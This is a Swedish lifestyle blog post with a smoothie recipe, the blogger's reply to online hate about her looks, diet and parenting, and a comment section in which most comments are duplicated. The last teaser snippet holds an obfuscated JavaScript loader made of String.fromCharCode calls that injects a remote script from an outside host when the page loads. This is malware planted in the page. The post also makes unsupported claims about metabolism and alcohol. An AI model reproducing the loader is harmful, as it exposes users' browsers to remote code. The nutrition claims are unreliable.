Recept på magiskt good smoothie! Biter ifrån till mina näthatare!

IMG_0399

 

Hej Vännen!

Nyttig smoothie är väl aldrig fel? Man kan äta det till frukost, som mellanmål eller efter träning =)

 Recept:

Lättkvarg, färska hallon, blåbär, lite vaniljprotein pulver, toppat med blåbär, kiwi och kokos  Lätt,smidigt och enkelt. Mixa allt i en mixer och servera i ett snyggt glas för att höja feelgood känslan =)

Denna kombinationen var det min kalmar-fru som bjöd mig på, det har blivit en storfavorit! -älskar kokos! 

Jag minskar lite på mängden kvarg om jag blandar i proteinpulvret…. att få i mig rätt protein i slutändan ändå =) -perfekt efter träning!

Nu har jag fått lite kritik på mina senaste inlägg. Ganska ovanligt, för min del då dom flesta här inne brukar vara snälla, gulliga och omtänksamma  både mot mig och varandra  =)

Men nu har någon lämnat en kommentar öppet på bloggen men ett flertal har mailat mig privat… Lite fegt att maila mig istället för att skriva öppet. Detta var efter inlägget från plåtningen för Wallderinska. Alla är dock överens om att kläderna är grymt snygga! =) 

Jag fick kommentarer så som

”fy fan vilka fula läppar, kanske dags att sluta med fillers”

Eller ”guuuud vad svullen du ser ut i ansiktet”,  eller

”din diet att svälta sig är absurd m.m” ”du är en pinsam mamma”  ”dålig förebild för dina barn” 

Vet ni vad, jag kan ta kritik, och svarar alltid öppet och ärligt. Detta var bara en bråkdel utav påhoppen, jag förstår faktiskt inte varför? Så nu vill jag bara dementera vissa påhopp,

Jag är inte en dålig förebild för mina barn, jag har ett barn, en son som jag kallar Lilleman. Det är för helvete inget utvik jag gjort! Jag gör plåtningar för vissa olika företag där bilderna sen används som produkt bilder, det är ett JOBB! Som inte påverkar min son på något sätt! 

Jag har aldrig gjort mina läppar, jag har alltid haft stor mun både verbalt och fysiskt. Jag bloggar öppet om min operation så OM jag skulle provat fillers så skulle jag inte skämmas över att dela med mig utav detta. Men jag anser mig inte behöva pumpa upp mina läppar! 😉 -så det så! 

Vad det gäller argumenten gällande min ”diet” så vill jag först och främst undvika att kalla det diet. jag kallar det kostschema.En långsiktig förändring då jag strävar ot ett nyttigare och hälsosammare liv!

Det går ut på att höja ämnesomsättningen. Jag svälter mig INTE! Jag äter mer än någonsin och går ändå ner i vikt. Målet är inte att bli anorektisk, målet är att komma tillbaka ner i min normalvikt, då dom sista kilona efter att jag vägt strax under 100 kg inte vill ge med sig!

 Just nu står jag stilla på vägen, jag har syndat på Finest Awards, druckit alkohol, både i onsdags och förra helgen på bloggträffen.

Jag är lite besviken på mig själv gällande detta. Men känner mig ändå nöjd över att jag inte tappat kosten och därför stått stilla viktmässigt istället för att lägga på mig igen.

En vännina sa till mig innan finest:

-”varför äter du dina biffar, du ska ju ändå dricka alkohol ikväll?” 

Hon hade förvisso rätt, men smartast är att följa kostschemat och hålla ämnesomsättningen igång iallfall…. Annars stannar ju ämnesomsättningen av och suger då åt sig ännu mer utav alkoholen och sockret man får i sig då….

Så även om man ”kör i diket” ibland så ska man inte ge upp och känna att det är ”skit samma” för det är det INTE!!!! Ta bara nya tag och gör allting annat så rätt som du kan. Tänka bara på vad som får dig att må bra och inte må bra…. Om jag svullar en kväll i soffan med glas, godis osv, så mår jag jätte illa, både psykiskt och fysiskt! Så ett tips är att ställa sig frågan o det är värt den illamående känslan som så många känner igen si i?  -är det verkligen värt det?

Guuuud vad jag låter bitter, det är sällan som jag snäser ifrån, men elaka påhopp mot mig eller varandra här inne är inte okay!

Nu ska jag luta mig tillbaka i soffan med min Lilleman. När han har somnat så ska jag sätta mig vid dator och jobba ett par timmar. Många roliga projekt på G framåt och mycket som behöver planeras. -Jätte kul!  Jag ska även maila min DR Tuve från Citadell linjen och fråga om jag kan börja smyg träna lite… jag klättrar snart på väggarna av att inte få träna. Men jag inväntar med spänning hans svar. Hur eller hur så kommer jag från imorgon att börja gå ut och gå 40min/dagen!

Vi hörs snart igen! Kramar My Martens

85 Komentarer

 1. Det är tråkigt med människor som mår så dåligt själva att enda sättet att må lite bättre för en kort stund är att prata illa om och försöka trycka ner någon annan. För det är precis det som den typen av kommentarer handlar om, de handlar inte om dig utan om personerna som skriver dem. Det här vet du säkert redan så jag säger det bara som en uppmuntrande påminnelse om att du inte har någon som helst anledning att ta åt dig av dem, däremot tycker jag du gör helt rätt som biter ifrån och inte accepterar dumheterna. Det är viktigt att alla, både de som drabbas av näthat och de som ser andra näthata, uppmärksammar det och talar om att det inte är ett acceptabelt beteende. Hur dåligt man än mår så är det inte okej att ta ut sin frustration på andra, be om hjälp istället så kommer alla att må bättre och bli gladare.
  Charlotta

 2. My !!
  Strunta i alla dumma kommentarer Du är en förebild för många
  en underbar mamma för din son oh en underbar person och en härlig person att läsa . Din blogg är bara så underbar
  Många kramar från en mamma

 3. Fyy för näthatare… Dessa människor borde ta en närmre titt i spegeln på sig själva först innan dom kritiserar någon annan!

 4. Tycker du verka var en super bra mamma,och en super trevlig människa.Du är super söt (snygg).Tråkigt att det finns människor som bara vill trycka ner människor.kram på dig

 5. Hej! Hoppade på din utmaning för 7 dagar sedan och du är ju en grym inspiration! Inget socker, äter var tredje timme och går minst 10 000 steg om dagen… Styrkeövningar hemma 3-4 dagar/ v … Körde på lite extra nu inför sommaren! Hade gärna velat ha lite recept att följa ;)Tycker att du är jätte modig som låter dig plåtas och lägger upp! Inte alla som vågat de! Tack för grym inspiration!

  • Hej! Grymt bra jobbat! Förta veckan utan socker är alltid extra jobbig! Men kör på ? Jag själv som fortfarande rehabiliteras efter min bukplastik kan inte träna ännu… Så man kan säga att min situation är att börja om på noll! Jag kommer att dela med mig utav både recept och träningstips i de takt jag kan komma igång.. Jag tycker verkligen vi ska peppa varandra här inne! Kram

 6. Hej
  jag är väldigt nyfiken på ditt kostschema. Vad är det du tillsätter för ”pulver”? Recept på mat?
  Vill du inte skriva här så maila mig gärna
  Karin, Kolmården
  67kimd@gmail.com

  • Hej Karin! jag utvärderar fortfarande mitt kostschema, så innan jag har gjord det klart så ill jag inte skriva om det… Det är väldigt viktigt för mig att jag verkligen kan så för det jag rekommenderar =) MEN Men snart så ? Börja med regelbundna måltider, minska salt och socker mängden och tänk på att äta nyttigt =) Mvh My Martens

 7. Åh vuxna mnsk asså!! Avundsjuka gör vissa helt knäppa.. Bästa sättet är säga ifrån och sen gå vidare. Om man ger dem för mkt uppmärksamhet så växer de bara.
  Utvik??? Oj vad kallas då bikinibilder?
  Och jag tycker du ser enormt sund å vacker ut. Ingen pinnsmal Donna som lever på att du blitt kändis i en dokusåpa.
  Så be strong My och kan lova att Lilleman kommer ( o är ) grymt stolt över att DU är hans mamma!!!

 8. Det är tråkigt med människor som mår så dåligt själva att enda sättet att må lite bättre för en kort stund är att prata illa om och försöka trycka ner någon annan. För det är precis det som den typen av kommentarer handlar om, de handlar inte om dig utan om personerna som skriver dem. Det här vet du säkert redan så jag säger det bara som en uppmuntrande påminnelse om att du inte har någon som helst anledning att ta åt dig av dem, däremot tycker jag du gör helt rätt som biter ifrån och inte accepterar dumheterna. Det är viktigt att alla, både de som drabbas av näthat och de som ser andra näthata, uppmärksammar det och talar om att det inte är ett acceptabelt beteende. Hur dåligt man än mår så är det inte okej att ta ut sin frustration på andra, be om hjälp istället så kommer alla att må bättre och bli gladare.
  Charlotta

 9. My !!
  Strunta i alla dumma kommentarer Du är en förebild för många
  en underbar mamma för din son oh en underbar person och en härlig person att läsa . Din blogg är bara så underbar
  Många kramar från en mamma

 10. Fyy för näthatare… Dessa människor borde ta en närmre titt i spegeln på sig själva först innan dom kritiserar någon annan!

 11. Tycker du verka var en super bra mamma,och en super trevlig människa.Du är super söt (snygg).Tråkigt att det finns människor som bara vill trycka ner människor.kram på dig

 12. Guuuud vilken snygg duk! Måste bara fråga varifrån du har köpt den eller va de är för märke? Tacksam för svar

 13. Hej! Hoppade på din utmaning för 7 dagar sedan och du är ju en grym inspiration! Inget socker, äter var tredje timme och går minst 10 000 steg om dagen… Styrkeövningar hemma 3-4 dagar/ v … Körde på lite extra nu inför sommaren! Hade gärna velat ha lite recept att följa ;)Tycker att du är jätte modig som låter dig plåtas och lägger upp! Inte alla som vågat de! Tack för grym inspiration!

  • Hej! Grymt bra jobbat! Förta veckan utan socker är alltid extra jobbig! Men kör på 😉 Jag själv som fortfarande rehabiliteras efter min bukplastik kan inte träna ännu… Så man kan säga att min situation är att börja om på noll! Jag kommer att dela med mig utav både recept och träningstips i de takt jag kan komma igång.. Jag tycker verkligen vi ska peppa varandra här inne! Kram

 14. Hej
  jag är väldigt nyfiken på ditt kostschema. Vad är det du tillsätter för ”pulver”? Recept på mat?
  Vill du inte skriva här så maila mig gärna
  Karin, Kolmården

  67kimd@gmail.com

  • Hej Karin! jag utvärderar fortfarande mitt kostschema, så innan jag har gjord det klart så ill jag inte skriva om det… Det är väldigt viktigt för mig att jag verkligen kan så för det jag rekommenderar =) MEN Men snart så 😉 Börja med regelbundna måltider, minska salt och socker mängden och tänk på att äta nyttigt =) Mvh My Martens

 15. Vilka hemska människor det finns dessa nättroll! Varför vill de trycka ner dig och vara så respektlösa, dessutom anonymt.. Vilka ynkryggar!
  Jag måste säga att du ser fräsch och vacker ut. Du framhöver verkligen kläderna på ett snyggt sätt och de kunde inte hittat en bättre tjej, eftersom du är en person som många kan identifiera sig med. Såg att några kommenterat dina armhålor och jag vet att det inte har något med brunutansol eller hygien att göra! Det är insulin i huden. Jag fick det efter att ha gått mycket upp i vikt under en 5-årsperiod och det var verkligen en varningsklocka som fick mig att ta tag i min hälsa. Man kan få det runt halsen, i armveck, knäveck, under brösten, mellan benen osv. Sjukdomen heter Acanthosis nigricans och det kan innebära att man har diabetes el insulinresistens. Missbrukar man socker och röker är man i riskzonen men slutar man kan sjukdomen/symtomen försvinna. Om jag var du skulle jag göra ett diabetestest. Hoppas inte du tar illa upp. Ville bara skriva i all välmening gör jag fick själv en chock när jag blev varse. Tack för en jättebra och inspirerAnde blogg!

 16. Åh vuxna mnsk asså!! Avundsjuka gör vissa helt knäppa.. Bästa sättet är säga ifrån och sen gå vidare. Om man ger dem för mkt uppmärksamhet så växer de bara.
  Utvik??? Oj vad kallas då bikinibilder?
  Och jag tycker du ser enormt sund å vacker ut. Ingen pinnsmal Donna som lever på att du blitt kändis i en dokusåpa.
  Så be strong My och kan lova att Lilleman kommer ( o är ) grymt stolt över att DU är hans mamma!!!

 17. Hej My!
  Har börjat läsa din blogg och tycker du verkar vara en fantastisk tjej! Du inspirerar på ett härligt sätt och du känns väldigt snäll o god. Tycker inte att du ens ska reflektera över de dumma kommentarerna. Både du och dina läsare vet att det inte är som ”trollen” skriver. Jag tror däremot inte människor gör det för att vara elaka, jag tror att det kan bottna i avundsjuka eller att inte förmågan finns att se att man gör fel och är elak. Tror att bästa sättet är om du kan vara stark o ignorera dem men det kan inte vara lätt! Tack för en trevlig blogg/Marie

  • Hej Marie! Du har helt rätt, det bästa är att bara ignorera det..
   jag har själv alltid haft det mottot att om man behöver trycka ner andra för att må bättre själva så talar det mycket mer om personen som agerar så än om den personen som får påhoppen emot sig.. Lite sorglig.. Men just igår kände jag att jag ville säga ifrån då det var ganska många som tyckte till, på ett minst sagt otrevligt sätt… Tack =) Kram

 18. Hej My! Brukar nästan aldrig kommentera på bloggar, men kände att jag var tvungen. Du var ju så himla fin på bilderna , med en helt perfekt kvinnlig kropp!! Så strunt i alla dumma kommentarer jag tycker du är en bra och vacker förebild! Kram till dig!

  • Hej Hanna! tack snälla du för dina fina ord <3 Jag försöker att bara låta dom rinna av mig, men kände ändå att jag behövde skriva av mig lite igår… =) tack igen! kram

 19. Vilka hemska människor det finns dessa nättroll! Varför vill de trycka ner dig och vara så respektlösa, dessutom anonymt.. Vilka ynkryggar!
  Jag måste säga att du ser fräsch och vacker ut. Du framhöver verkligen kläderna på ett snyggt sätt och de kunde inte hittat en bättre tjej, eftersom du är en person som många kan identifiera sig med. Såg att några kommenterat dina armhålor och jag vet att det inte har något med brunutansol eller hygien att göra! Det är insulin i huden. Jag fick det efter att ha gått mycket upp i vikt under en 5-årsperiod och det var verkligen en varningsklocka som fick mig att ta tag i min hälsa. Man kan få det runt halsen, i armveck, knäveck, under brösten, mellan benen osv. Sjukdomen heter Acanthosis nigricans och det kan innebära att man har diabetes el insulinresistens. Missbrukar man socker och röker är man i riskzonen men slutar man kan sjukdomen/symtomen försvinna. Om jag var du skulle jag göra ett diabetestest. Hoppas inte du tar illa upp. Ville bara skriva i all välmening gör jag fick själv en chock när jag blev varse. Tack för en jättebra och inspirerAnde blogg!

 20. Hej My!
  Har börjat läsa din blogg och tycker du verkar vara en fantastisk tjej! Du inspirerar på ett härligt sätt och du känns väldigt snäll o god. Tycker inte att du ens ska reflektera över de dumma kommentarerna. Både du och dina läsare vet att det inte är som ”trollen” skriver. Jag tror däremot inte människor gör det för att vara elaka, jag tror att det kan bottna i avundsjuka eller att inte förmågan finns att se att man gör fel och är elak. Tror att bästa sättet är om du kan vara stark o ignorera dem men det kan inte vara lätt! Tack för en trevlig blogg/Marie

  • Hej Marie! Du har helt rätt, det bästa är att bara ignorera det..
   jag har själv alltid haft det mottot att om man behöver trycka ner andra för att må bättre själva så talar det mycket mer om personen som agerar så än om den personen som får påhoppen emot sig.. Lite sorglig.. Men just igår kände jag att jag ville säga ifrån då det var ganska många som tyckte till, på ett minst sagt otrevligt sätt… Tack =) Kram

 21. Hej My! Brukar nästan aldrig kommentera på bloggar, men kände att jag var tvungen. Du var ju så himla fin på bilderna , med en helt perfekt kvinnlig kropp!! Så strunt i alla dumma kommentarer jag tycker du är en bra och vacker förebild! Kram till dig!

  • Hej Hanna! tack snälla du för dina fina ord <3 Jag försöker att bara låta dom rinna av mig, men kände ändå att jag behövde skriva av mig lite igår… =) tack igen! kram

 22. Jag vet inte vad som hänt med människor, att vara ärlig handlar inte om att man kan säga vilken dynga som helst till andra människor.
  Tycker jag att någon bild är knepig eller om det är något nån skriver som jag inte håller med om så har jag inget behov att skriva ut detta och såra någon annan!
  Däremot försöker jag verkligen få tummen ur att skriva en kommentar när det är något positivt jag läser eller ser! Som nu;)
  Jag började läsa din blogg när du skulle göra din operation du blev mer ärlig och öppen i bloggen och man fick se vilken härlig och rolig tjej du är, lite som Graaf, ni verkar ha så kul ihop=)

  • Hej Sara! Haha! Vad gullig du är! Tack <3 Ja, jag bestämde mig då för att vara 100% ärlig. Vilket såklart kan vara på både gott och ont ? Men jag vidhåller ändå att jag tror att det är ett vinnande koncept i längden… -Ärlighet varar längst! Ja, Maggan är fantastisks! Vi är lika galna båda två, det är nog därför vi funnit varandra ? Ha en fin dag! Kram

 23. Jag vet inte vad som hänt med människor, att vara ärlig handlar inte om att man kan säga vilken dynga som helst till andra människor.
  Tycker jag att någon bild är knepig eller om det är något nån skriver som jag inte håller med om så har jag inget behov att skriva ut detta och såra någon annan!
  Däremot försöker jag verkligen få tummen ur att skriva en kommentar när det är något positivt jag läser eller ser! Som nu;)
  Jag började läsa din blogg när du skulle göra din operation du blev mer ärlig och öppen i bloggen och man fick se vilken härlig och rolig tjej du är, lite som Graaf, ni verkar ha så kul ihop=)

  • Hej Sara! Haha! Vad gullig du är! Tack <3 Ja, jag bestämde mig då för att vara 100% ärlig. Vilket såklart kan vara på både gott och ont 😉 Men jag vidhåller ändå att jag tror att det är ett vinnande koncept i längden… -Ärlighet varar längst! Ja, Maggan är fantastisks! Vi är lika galna båda två, det är nog därför vi funnit varandra 😉 Ha en fin dag! Kram

 24. Hej My
  Har precis börjat läsa din blogg tycker det är spännande med din kost då jag själv försöker gå efter kostschema och det är på lång sikt jag gör detta för att få in bra kost tänk. Beträffande ditt utseende tycker jag du ser naturlig ut fattar inte vad dom menar med dina läpppar…….mm.så så på dig.
  skickar här en kram så här i början på veckan och önskar Glad påsk.
  Ewa

  • Hej Ewa! Vad roligt att du har hittat hit.. Ja ibland får man ta en del elaka påhopp, jag brukar sällan ta upp dom, men just igår så kände jag att det fick vara nog! Tack snälla du, glad påsk till dig också! Kramar
   Ps Allting går om man vill… små förändringar ger stora resultat…

 25. Vad tråkigt med sådana kommentarer. Det var fina bilder från fototagningen.
  Sedan tycker jag att det är grymt bra gjort av dig att sluta röka, gjort bukplastik och sedan din koständring! Lite bakslag får man räkna med…
  Tack för en bra blogg!
  Ha en fin dag!

 26. Hej My
  Har precis börjat läsa din blogg tycker det är spännande med din kost då jag själv försöker gå efter kostschema och det är på lång sikt jag gör detta för att få in bra kost tänk. Beträffande ditt utseende tycker jag du ser naturlig ut fattar inte vad dom menar med dina läpppar…….mm.så så på dig.
  skickar här en kram så här i början på veckan och önskar Glad påsk.
  Ewa

  • Hej Ewa! Vad roligt att du har hittat hit.. Ja ibland får man ta en del elaka påhopp, jag brukar sällan ta upp dom, men just igår så kände jag att det fick vara nog! Tack snälla du, glad påsk till dig också! Kramar
   Ps Allting går om man vill… små förändringar ger stora resultat…

 27. Hej My. Jag är ganska nu läsare av din fina blogg och tycker du är inspirerande och fantastisk på många sätt som så öppet berättar om din tillvaro. Folk som skriver massa negativa personliga saker om din kropp och annat borde verkligen skämmas. Det är såå lågt och fult med denna nätmobbing. Tror inte att många av dem skulle ha mage att säga det till dig ansikte mot ansikte. Fegt helt enkelt. Jag blir jätteinspirerad av det du skriver. Har hela mitt liv kämpat med vikten och är nu för första gången i mitt liv normalviktig igen. Försöker lära mig hitta balansen i livet med kost, träning, jobb och annat. Har efter nästan 25 år av övervikt mycket häng på magen så jag följer din op och uppdateringarna där med stort intresse då jag har stora funderingar att själv göra en bukplastikop. Tack för en inspirerande blogg och stå på dig. Kram

  • Hej Annelie! Tack snälla för dina varma ord… Jag tror precis som du, ånga vågar inte säga det öga mot öga, men bakom datorskärmarna är man trygga ? Vad duktig du är bra jobbat! Bukplastiken är det bästa jag gjort, verkligen! Även om min rehabilitering är långtifrån över…. Om du funderar påen bukplastik så rekommenderar jag dig verklige att gå på en konsultation, jag gjorde flera stycken innan jag bestämde mig =) -lycka till! Kramar

 28. Vad tråkigt med sådana kommentarer. Det var fina bilder från fototagningen.
  Sedan tycker jag att det är grymt bra gjort av dig att sluta röka, gjort bukplastik och sedan din koständring! Lite bakslag får man räkna med…
  Tack för en bra blogg!
  Ha en fin dag!

 29. Hej My. Jag är ganska nu läsare av din fina blogg och tycker du är inspirerande och fantastisk på många sätt som så öppet berättar om din tillvaro. Folk som skriver massa negativa personliga saker om din kropp och annat borde verkligen skämmas. Det är såå lågt och fult med denna nätmobbing. Tror inte att många av dem skulle ha mage att säga det till dig ansikte mot ansikte. Fegt helt enkelt. Jag blir jätteinspirerad av det du skriver. Har hela mitt liv kämpat med vikten och är nu för första gången i mitt liv normalviktig igen. Försöker lära mig hitta balansen i livet med kost, träning, jobb och annat. Har efter nästan 25 år av övervikt mycket häng på magen så jag följer din op och uppdateringarna där med stort intresse då jag har stora funderingar att själv göra en bukplastikop. Tack för en inspirerande blogg och stå på dig. Kram

  • Hej Annelie! Tack snälla för dina varma ord… Jag tror precis som du, ånga vågar inte säga det öga mot öga, men bakom datorskärmarna är man trygga 😉 Vad duktig du är bra jobbat! Bukplastiken är det bästa jag gjort, verkligen! Även om min rehabilitering är långtifrån över…. Om du funderar påen bukplastik så rekommenderar jag dig verklige att gå på en konsultation, jag gjorde flera stycken innan jag bestämde mig =) -lycka till! Kramar

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/